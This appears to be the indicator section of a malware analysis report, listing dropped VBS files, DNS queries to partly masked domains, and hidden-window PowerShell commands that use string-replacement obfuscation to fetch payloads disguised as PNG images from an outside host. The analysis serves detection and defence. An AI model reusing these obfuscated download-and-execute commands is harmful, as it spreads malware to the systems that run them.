Technical Information
- %LOCALAPPDATA%\microsoft\ml.vbs
- %LOCALAPPDATA%\microsoft\fick.vbs
- %LOCALAPPDATA%\microsoft\fick.vbs
- %LOCALAPPDATA%\microsoft\ml.vbs
- '2n#.co':443
- '2n#.co':443
- DNS ASK 2n#.co
- DNS ASK mi###ore.top
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\Microsoft\ML.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%LOCALAPPDATA%\Microsoft\FICK.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='ht[P][O][W][E][R]tp://mi[P][O][W][E][R]ranore.[P][O][W][E][R]top/11[P][O][W][E][R]HHHHHHHHHHHHHHHH/FFFF[P][O][W][E][R]FFFFFF/FI[P][O][W][E][R]CK.PNG'.Replace('[P][O][W][E][R]','');$sss= '...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='h>>>[CODE]<<<ttp:>>>[CODE]<<<//>>>[CODE]<<<miranore.>>>[CODE]<<<top/11HHHHHHHHHHHHHHHH/LLLLLLLLLLLLLLLLL/ID.>>>[CODE]<<<PN>>>[CODE]<<<G'.Replace('>>>[CODE]<<<','');$sss= '(NESTRDTYUGIHGYF...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='ht[P][O][W][E][R]tp://mi[P][O][W][E][R]ranore.[P][O][W][E][R]top/11[P][O][W][E][R]HHHHHHHHHHHHHHHH/FFFF[P][O][W][E][R]FFFFFF/FI[P][O][W][E][R]CK.PNG'.Replace('[P][O][W][E][R]','');$sss= '...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $www='h>>>[CODE]<<<ttp:>>>[CODE]<<<//>>>[CODE]<<<miranore.>>>[CODE]<<<top/11HHHHHHHHHHHHHHHH/LLLLLLLLLLLLLLLLL/ID.>>>[CODE]<<<PN>>>[CODE]<<<G'.Replace('>>>[CODE]<<<','');$sss= '(NESTRDTYUGIHGYF...